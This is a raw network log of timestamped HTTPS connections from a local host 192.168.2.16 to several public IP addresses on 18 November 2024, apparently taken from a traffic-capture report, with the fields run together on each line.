                                                                                                                                                                                            Nov 18, 2024 21:00:57.348450899 CET49899443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:57.348484993 CET44349899142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:57.348818064 CET49899443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:57.348918915 CET44349899142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:57.348994017 CET49899443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:57.350981951 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:57.351037979 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:57.351129055 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:57.351365089 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:57.351393938 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:57.364433050 CET49898443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:57.364448071 CET44349898142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:57.364768982 CET49898443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:57.365065098 CET44349898142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:57.365143061 CET49898443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:58.238116026 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:58.238413095 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:58.238488913 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:58.240045071 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:58.240119934 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:58.240497112 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:58.240587950 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:58.240698099 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:58.240716934 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:58.287619114 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:58.513586998 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:58.559643030 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:58.559704065 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:58.560314894 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:58.560564041 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:58.560779095 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:58.560786963 CET44349900142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:58.560844898 CET49900443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:00.001019001 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.001127005 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.001231909 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.001416922 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.001456022 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.656701088 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.667350054 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.667412996 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.668745041 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.668891907 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.671268940 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.671339035 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.680964947 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.681116104 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.681133032 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.681178093 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.730433941 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.730454922 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.778527021 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.833839893 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.835217953 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:00.835293055 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.836267948 CET49902443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:00.836308002 CET44349902216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:02.994667053 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:02.994755983 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:02.995074987 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:02.995970964 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:02.996021986 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.000263929 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:03.000293016 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.000371933 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:03.000541925 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:03.000555038 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.806591988 CET49906443192.168.2.16172.217.16.132
                                                                                                                                                                                            Nov 18, 2024 21:01:03.806683064 CET44349906172.217.16.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.806768894 CET49906443192.168.2.16172.217.16.132
                                                                                                                                                                                            Nov 18, 2024 21:01:03.806977987 CET49906443192.168.2.16172.217.16.132
                                                                                                                                                                                            Nov 18, 2024 21:01:03.807034016 CET44349906172.217.16.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.855477095 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.855772018 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:03.855812073 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.859391928 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.859462976 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:03.859786034 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:03.859961033 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:03.859965086 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.860120058 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.872251987 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.872474909 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:03.872514963 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.873645067 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.873720884 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:03.874106884 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:03.874176979 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.874308109 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:03.874325037 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.899435043 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:03.899451971 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:03.915446043 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:03.946433067 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:04.129081011 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.149116993 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.149236917 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.149307013 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:04.149333000 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.149363995 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.149411917 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:04.149447918 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.183460951 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:04.183494091 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.183890104 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:04.183989048 CET44349904142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.184068918 CET49904443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:01:04.199445009 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:04.199476004 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.199748039 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:04.200067043 CET44349903142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.200149059 CET49903443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202172041 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202264071 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202352047 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202486038 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202524900 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202594042 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202708960 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202739000 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202846050 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:04.202858925 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427088976 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427140951 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427223921 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427366972 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427443027 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427515984 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427584887 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427608013 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427746058 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:04.427778006 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.655703068 CET44349906172.217.16.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.656107903 CET49906443192.168.2.16172.217.16.132
                                                                                                                                                                                            Nov 18, 2024 21:01:04.656169891 CET44349906172.217.16.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.657310009 CET44349906172.217.16.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.657655954 CET49906443192.168.2.16172.217.16.132
                                                                                                                                                                                            Nov 18, 2024 21:01:04.657839060 CET44349906172.217.16.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:04.710433960 CET49906443192.168.2.16172.217.16.132
                                                                                                                                                                                            Nov 18, 2024 21:01:05.052511930 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.052793026 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.052812099 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.054265022 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.054331064 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.054635048 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.054780006 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.054784060 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.054868937 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.083556890 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.083848953 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:05.083883047 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.085541010 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.085709095 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:05.085889101 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:05.085977077 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.086092949 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:05.086102009 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.094456911 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.094480991 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.125564098 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:05.141516924 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.270840883 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.271116018 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.271177053 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.271898031 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.272234917 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.272344112 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.272474051 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.289958954 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.290199041 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.290261030 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.294074059 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.294245958 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.294442892 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.294543982 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.294560909 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.294697046 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.315341949 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.319571972 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.319701910 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.319746971 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.319787979 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.319863081 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.319863081 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.319878101 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.345101118 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.348444939 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.348465919 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.364554882 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.364562988 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.364712000 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.364761114 CET44349908142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.364821911 CET49908443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:01:05.396543980 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.396549940 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:05.396610022 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.396881104 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:05.397191048 CET44349907142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.397273064 CET49907443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:01:05.399904013 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:05.400024891 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.400109053 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:05.400454998 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:05.400533915 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.517277002 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.517422915 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.517699957 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.517872095 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.517896891 CET44349910157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.517935991 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.517978907 CET49910443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.520509005 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.520539045 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.520615101 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.520848036 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.520863056 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.653364897 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.653506994 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.653592110 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.653640985 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.653680086 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.653732061 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.653748035 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.655956030 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.656270027 CET44349909157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.656353951 CET49909443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.661524057 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.661569118 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:05.661678076 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.661906004 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:05.661919117 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.275564909 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.275954008 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:06.276016951 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.277689934 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.277879000 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:06.278145075 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:06.278222084 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:06.278248072 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.278455019 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.333447933 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:06.333508968 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.378318071 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.378735065 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.378762007 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.379439116 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:06.380207062 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.380278111 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.380791903 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.380870104 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.380970955 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.380980968 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.426533937 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.507647038 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.508013010 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.508055925 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.509630919 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.510061979 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.510205030 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.510212898 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.510248899 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.548326969 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.553467035 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.601490021 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:06.601548910 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.602765083 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:06.603090048 CET44349911142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.603353024 CET49911443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:06.629456043 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.629550934 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.629606009 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.629973888 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.629996061 CET44349912157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.630004883 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.630038977 CET49912443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.865036964 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.865185976 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.865253925 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.865283966 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.865386009 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.865442038 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.865449905 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.866244078 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:06.866538048 CET44349913157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:06.866609097 CET49913443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:01:08.007291079 CET49914443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:08.007338047 CET44349914216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.007412910 CET49914443192.168.2.16216.239.34.181
